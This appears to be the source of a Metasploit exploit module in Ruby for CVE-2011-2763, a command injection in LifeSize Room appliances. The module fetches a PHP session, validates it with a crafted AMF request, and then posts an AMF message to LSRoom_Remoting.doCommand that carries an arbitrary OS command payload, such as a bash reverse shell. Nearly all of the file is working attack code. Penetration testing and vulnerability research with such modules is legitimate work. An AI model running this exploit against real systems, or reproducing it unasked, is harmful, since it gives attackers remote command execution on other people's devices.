metasploit-framework/modules/exploits/unix/http/lifesize_room.rb

108 lines
3.3 KiB
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'LifeSize Room Command Injection',
'Description' => %q{
This module exploits a vulnerable resource in LifeSize
Room versions 3.5.3 and 4.7.18 to inject OS commands. LifeSize
Room is an appliance and thus the environment is limited
resulting in a small set of payload options.
},
'Author' =>
[
# SecureState R&D Team - Special Thanks To Chris Murrey
'Spencer McIntyre',
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-2763' ],
[ 'OSVDB', '75212' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 65535, # limited by the two byte size in the AMF encoding
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp',
}
},
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [ [ 'Automatic', { } ] ],
'DisclosureDate' => 'Jul 13 2011',
'DefaultTarget' => 0))
end
def exploit
print_status("Requesting PHP Session...")
res = send_request_cgi({
'encode' => false,
'uri' => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}",
'method' => 'GET',
}, 10)
if res.nil? || res.get_cookies.empty?
fail_with(Failure::NotFound, 'Could not obtain a Session ID')
end
sessionid = 'PHPSESSID=' << res.get_cookies.split('PHPSESSID=')[1].split('; ')[0]
headers = {
'Cookie' => sessionid,
'Content-Type' => 'application/x-amf',
}
print_status("Validating PHP Session...")
data = "\x00\x00\x00\x00\x00\x02\x00\x1b"
data << "LSRoom_Remoting.amfphpLogin"
data << "\x00\x02/1\x00\x00\x00"
data << "\x05\x0a\x00\x00\x00\x00\x00\x17"
data << "LSRoom_Remoting.getHost"
data << "\x00\x02\x2f\x32\x00\x00\x00\x05\x0a\x00\x00\x00\x00"
res = send_request_cgi({
'encode' => false,
'uri' => '/gateway.php',
'data' => data,
'method' => 'POST',
'headers' => headers,
}, 10)
if not res
fail_with(Failure::NotFound, 'Could not validate the Session ID')
return
end
print_status("Sending Malicious POST Request...")
# This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand
amf_data = "\x00\x00\x00\x00\x00\x01\x00\x19"
amf_data << "LSRoom_Remoting.doCommand"
amf_data << "\x00\x02\x2f\x37\xff\xff\xff\xff"
amf_data << "\x0a\x00\x00\x00\x02\x02#{[payload.encoded.length].pack('n')}#{payload.encoded}"
amf_data << "\x02\x00\x0dupgradeStatus"
res = send_request_cgi({
'encode' => false,
'uri' => '/gateway.php?' << sessionid,
'data' => amf_data,
'method' => 'POST',
'headers' => headers
}, 10)
end
end